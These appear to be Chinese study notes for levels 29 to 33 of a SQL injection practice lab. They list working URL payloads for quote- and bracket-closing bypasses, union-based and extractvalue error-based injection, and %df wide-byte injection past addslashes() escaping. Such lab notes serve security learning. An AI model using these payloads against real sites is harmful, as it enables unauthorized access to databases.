29关知识点:
- 单引号闭合绕过
- 联合注入
- payload:id=0%27union+select+1,2,database()%271
- 报错注入
- id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
- 下面就不演示了,上面给出了payload,感觉没有任何过滤信息,那个waf应该是唬人的
30关知识点:
- 双引号闭合绕过
- 联合注入
- payload:id=0"union+select+1,database(),version()%20"
- 这里不能使用错误注入,没有回显信息
31关知识点:
- 原始语句
- where id=("输入")
- 报错注入
- 双引号闭合
- paylaod:id=1"+and+extractvalue(1,concat(0x7e,database(),0x7e))="1
- 双引号+括号闭合
- payload:id=1")+and+extractvalue(1,concat(0x7e,database(),0x7e))=("1
- 双引号闭合
- 联合注入
- payload:id=0")%20union%20select%201,database(),3%20and+1=("1
32关知识点:
- 单引号闭合+注释绕过
- 宽字节注入+错误注入
- 利用%df吞掉\ GBK模式采用两个字符表示一个中文字符
- payload:id=1%df%27%20and%20extractvalue(1,concat(0x7e,database(),0x7e))=0--+
- 宽字节注入+联合注入
- payload:id=0%df%27%20union%20select%201,database(),version()--+
- 对单引号、双引号、\ 进行了过滤
33关知识点:
- 和32关一模一样
- 过滤条件使用了addslashes()函数
- 效果就是把单引号、双引号、\、null进行转义了
- 和32关手写注释条件效果一样
- 具体payload就不写了,直接用32关的就好
10
